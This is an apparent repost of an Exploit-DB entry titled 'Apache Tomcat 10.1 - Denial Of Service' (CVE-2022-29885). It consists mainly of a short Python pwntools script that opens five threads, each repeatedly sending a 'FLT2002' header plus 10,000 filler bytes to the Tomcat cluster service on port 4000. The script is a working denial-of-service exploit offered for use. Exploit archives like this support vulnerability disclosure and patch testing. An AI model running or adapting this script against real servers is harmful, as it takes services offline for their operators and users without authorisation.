[dos] Apache Tomcat 10.1 - Denial Of Service
2023-4-5 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:14 收藏
2023-4-5 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:14 收藏
# Exploit Title: Apache Tomcat 10.1 - Denial Of Service
# Google Dork: N/A
# Date: 13/07/2022
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/download-10.cgi
# Version: <= 10.1
# Tested on: Apache Tomcat 10.0 (Docker)
# CVE : CVE-2022-29885 (CVE Owner: 4ra1n)
# Exploit pre-requirements: pip install pwntools==4.8.0
# Analysis : https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/
#!/usr/bin/env python3
# coding: utf-8
from pwn import *
import time
import threading
import subprocess
threads = []
def send_payload():
r = remote("localhost", 4000)
while True:
r.send(b"FLT2002" + b"A" * 10000)
for _ in range(5):
new_thread = threading.Thread(target=send_payload)
threads.append(new_thread)
new_thread.start()
for old_thread in threads:
old_thread.join()
文章来源: https://www.exploit-db.com/exploits/51262
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh